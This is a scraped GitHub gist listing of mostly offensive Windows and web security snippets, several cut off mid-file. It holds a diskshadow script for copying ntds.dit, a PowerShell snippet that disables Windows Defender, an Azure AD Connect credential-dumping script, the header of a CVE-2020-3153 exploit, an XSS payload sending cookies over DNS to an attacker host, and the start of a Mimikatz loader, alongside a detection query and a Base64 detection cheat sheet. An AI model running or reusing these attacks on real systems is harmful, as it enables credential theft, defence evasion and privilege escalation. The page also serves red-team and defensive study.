Skip to content

Instantly share code, notes, and snippets.

View bharadwajyas's full-sized avatar
🏠
Working from home

Yash Bharadwaj bharadwajyas

🏠
Working from home
32 followers · 22 following
View GitHub Profile
@cbecks2
cbecks2 / gist:19f2c8a773e78f2b757ca203173ae823
Created July 10, 2023 17:03
Crowdstrike Browser Downloaded Archive Executions
```This search looks at an archive embedded .lnk file being launched directly from the Browser Tray. This happens if a user opens something from a drive by or HTML Smuggle```
```Create a similar search for other common initial access filetypes like js, cmd, bat, vbs, msi, exe, scr, xll, etc. You will need to remove LinkName below.```
index=your_fdr_index event_platform=Win (event_simpleName=ProcessRollup2)
(LinkName="*\\AppData\\Local\\Temp\\Temp1_*.zip\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.rar\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Rar$*\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.iso\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.vhd\\*.lnk" OR
LinkName="*\\AppData\\Local\\Temp\\Temp1_*.vhdx\\*.lnk" OR
@b1gbroth3r
b1gbroth3r / diskshadow.txt
Last active February 10, 2022 20:27
Automates retrieval of system hive & ntds.dit using diskshadow.exe for password auditing/hash cracking. Modify where necessary. Please verify that the Z: drive isn't already mapped on the DC before running this. Running unix2dos against the .txt and .cmd files wouldn't hurt either.
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec scriptfile.cmd
delete shadows volume %someAlias%
reset
exit
@tyranid
tyranid / doh.ps1
Created May 4, 2020 15:17
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@xpn
xpn / azuread_decrypt_msol_v2.ps1
Last active February 4, 2026 13:50
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync"
try {
$client.Open()
} catch {
Write-Host "[!] Could not connect to localdb..."
return
@ykoster
ykoster / Invoke-ExploitAnyConnectPathTraversal.psm1
Last active May 5, 2021 23:19
Proof of concept for CVE-2020-3153 - Cisco AnyConnect elevation of privileges due to insecure handling of path names - https://www.securify.nl/advisory/SFY20200419/cisco-anyconnect-elevation-of-privileges-due-to-insecure-handling-of-path-names.html
<#
.Synopsis
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows
.Description
This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows.
When the -Command argument isn't provided a DLL is created at C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
This DLL is used by the On-Screen Keyboard (osk.exe) of Windows, which is exposed on the login/lock screen.
Opening the On-Screen Keyboard on this screen will run our DLL with LocalSystem privileges.
@joswr1ght
joswr1ght / Dump-Clipboard.ps1
Created January 27, 2020 13:12
Copy Clipboard Data from PowerShell
$x=""; while($true) { $y=get-clipboard -raw; if ($x -ne $y) { Write-Host $y; $x=$y } }
@nongiach
nongiach / xssdnss.md
Created December 27, 2019 00:13

Bellow to exfiltrate cookie over DNS when doing XSS

<script> document.location = "//" + btoa(document.cookie).replace(/[A-Z]/g, '$&.').replace(/=/g, 'X') + "I." + "YourBurpCollaborator"; </script>

Bellow to decode the cookie, make sure to ignore the I. at the end and replace the x with = at the end

atob("Your_Receveived_DNS".replace(/(.)./g, (_,x)=>x.toUpperCase()))

@v-p-b
v-p-b / AV2019.txt
Last active March 5, 2021 16:31
https://seclists.org/fulldisclosure/2019/Aug/1
https://medium.com/tenable-techblog/comodo-from-sandbox-to-system-cve-2019-3969-b6a34cc85e67
https://blog.silentsignal.eu/2019/06/24/self-defenseless-exploring-kasperskys-local-attack-surface/
https://safebreach.com/Post/BitDefender-Antivirus-Free-2020-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Trend-Micro-Password-Manager-Privilege-Escalation-to-SYSTEM
https://safebreach.com/Post/Check-Point-Endpoint-Security-Initial-Client-for-Windows-Privilege-Escalation-to-SYSTEM
http://rce4fun.blogspot.com/2019/08/comodo-antivirus-sandbox-race-condition.html
https://medium.com/bugbountywriteup/5-000-usd-xss-issue-at-avast-desktop-antivirus-for-windows-yes-desktop-1e99375f0968
https://posts.specterops.io/cve-2019-12757-local-privilege-escalation-in-symantec-endpoint-protection-1f7fd5c859c6
https://nafiez.github.io/security/poc/2019/11/22/POC-conference-present.html
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active December 1, 2025 19:51
Learning Aid - Top Base64 Encodings Table

Base64 Patterns - Learning Aid

Base64 Code Mnemonic Aid Decoded* Description
JAB 🗣 Jabber $. Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env:
TVq 📺 Television MZ MZ header
SUVY 🚙 SUV IEX PowerShell Invoke Expression
SQBFAF 🐣 Squab favorite I.E. PowerShell Invoke Expression (UTF-16)
SQBuAH 🐣 Squab uahhh I.n. PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz
PAA 💪 "Pah!" &lt;. Often used by Emotet (UTF-16)
@bharadwajyas
bharadwajyas / Tasks.cs
Created August 3, 2019 06:15
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*